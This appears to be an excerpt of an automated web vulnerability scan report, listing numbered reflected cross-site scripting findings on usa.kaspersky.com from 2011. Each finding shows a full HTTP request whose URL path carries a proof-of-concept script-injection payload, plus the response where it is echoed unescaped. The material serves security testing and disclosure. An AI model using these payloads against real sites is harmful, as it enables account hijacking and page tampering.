X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesd0fa3"-alert(1)-"d3bc9293f2f/204x50_product_6.jpg?1312840706";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.198. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c98"><script>alert(1)</script>740b9641b5a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/204x50_product_6.jpg15c98"><script>alert(1)</script>740b9641b5a?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:37:26 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139846"
Content-Type: text/html; charset=utf-8
Content-Length: 37147
Date: Sun, 04 Sep 2011 12:37:38 GMT
X-Varnish: 1163074387
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg15c98"><script>alert(1)</script>740b9641b5a?1312840706" />
...[SNIP]...

1.199. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/204x50_product_6.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7f5"-alert(1)-"49acdc67907 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/204x50_product_6.jpg3e7f5"-alert(1)-"49acdc67907?1312840706 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/products-services/home-computer-security/internet-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; intcamp=INT1673886; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5; NO_CACHE=Y; slider_session=yes; s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.5.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gpv_pageName=Search%20%7C%20Search%20Results; ev5=far%2Bhelp%2Bvirus; s_nr=1315139085816-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fnode%25252F17007%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:39:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139952"
Content-Type: text/html; charset=utf-8
Content-Length: 40718
Date: Sun, 04 Sep 2011 12:39:28 GMT
X-Varnish: 1163077255
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/204x50_product_6.jpg3e7f5"-alert(1)-"49acdc67907?1312840706";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.200. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f5c2"-alert(1)-"ee985bf493c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites6f5c2"-alert(1)-"ee985bf493c/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:30:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139436"
Content-Type: text/html; charset=utf-8
Content-Length: 29693
Date: Sun, 04 Sep 2011 12:30:43 GMT
X-Varnish: 1163063549
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites6f5c2"-alert(1)-"ee985bf493c/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg?1311949149";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.201. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67846"><script>alert(1)</script>be65bc9e9b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites67846"><script>alert(1)</script>be65bc9e9b4/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:29:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139394"
Content-Type: text/html; charset=utf-8
Content-Length: 29748
Date: Sun, 04 Sep 2011 12:30:10 GMT
X-Varnish: 1163062433
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites67846"><script>alert(1)</script>be65bc9e9b4/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg?1311949149" />
...[SNIP]...

1.202. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f93"-alert(1)-"88344e1a75c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.comc2f93"-alert(1)-"88344e1a75c/files/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:32:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139538"
Content-Type: text/html; charset=utf-8
Content-Length: 29693
Date: Sun, 04 Sep 2011 12:32:48 GMT
X-Varnish: 1163066182
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.comc2f93"-alert(1)-"88344e1a75c/files/718x96_Store-2012Promo.jpg?1311949149";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.203. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b92f7"><script>alert(1)</script>e64a1e12636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.comb92f7"><script>alert(1)</script>e64a1e12636/files/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:31:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139513"
Content-Type: text/html; charset=utf-8
Content-Length: 29748
Date: Sun, 04 Sep 2011 12:31:59 GMT
X-Varnish: 1163065446
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.comb92f7"><script>alert(1)</script>e64a1e12636/files/718x96_Store-2012Promo.jpg?1311949149" />
...[SNIP]...

1.204. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fce"-alert(1)-"d5f511604d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/filesc0fce"-alert(1)-"d5f511604d2/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:35:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139716"
Content-Type: text/html; charset=utf-8
Content-Length: 29693
Date: Sun, 04 Sep 2011 12:35:25 GMT
X-Varnish: 1163070902
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
nk You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/filesc0fce"-alert(1)-"d5f511604d2/718x96_Store-2012Promo.jpg?1311949149";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.205. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c39c"><script>alert(1)</script>b20d160fad6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files7c39c"><script>alert(1)</script>b20d160fad6/718x96_Store-2012Promo.jpg?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:34:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139640"
Content-Type: text/html; charset=utf-8
Content-Length: 29748
Date: Sun, 04 Sep 2011 12:34:23 GMT
X-Varnish: 1163069001
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files7c39c"><script>alert(1)</script>b20d160fad6/718x96_Store-2012Promo.jpg?1311949149" />
...[SNIP]...

1.206. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abf7"-alert(1)-"9b7583af2f7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg3abf7"-alert(1)-"9b7583af2f7?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:37:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139844"
Content-Type: text/html; charset=utf-8
Content-Length: 36780
Date: Sun, 04 Sep 2011 12:37:36 GMT
X-Varnish: 1163074316
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg3abf7"-alert(1)-"9b7583af2f7?1311949149";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.207. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95dba"><script>alert(1)</script>e48d751b1d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/718x96_Store-2012Promo.jpg95dba"><script>alert(1)</script>e48d751b1d4?1311949149 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/store/kaspersky-store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; NO_CACHE=Y; s_cc=true; intcamp=INT1673886; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.3.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); slider_session=yes; gpv_pageName=Search%20%7C%20Search%20Results; ev5=xss; s_nr=1315139065855-New; s_sq=kaspersky-usa%3D%2526pid%253DSearch%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT; op646kaspersky_us_storepagegum=a01603h0892794r05t3df84d5

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:36:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139811"
Content-Type: text/html; charset=utf-8
Content-Length: 32544
Date: Sun, 04 Sep 2011 12:37:00 GMT
X-Varnish: 1163073101
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
